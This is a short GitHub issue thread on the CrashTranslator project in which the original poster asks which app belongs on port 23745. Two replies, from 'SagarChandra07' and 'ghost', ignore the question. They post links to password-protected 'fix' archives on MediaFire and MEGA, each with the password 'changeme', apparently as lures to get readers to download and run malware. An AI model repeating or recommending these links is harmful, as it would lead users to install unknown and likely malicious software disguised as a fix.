### ISSUE TITLE
.

### ISSUE THREAD

**Issue by StwayneXG** [wuchiuwong/CrashTranslator#1]

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by ghost** [comment]
download

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Pass: changeme

you may need to install the c compiler

**Comment by StwayneXG** [comment]
I don't know which app is supposed to be running at port 23745. Appium runs on 4723 and Android device is running on 5555.
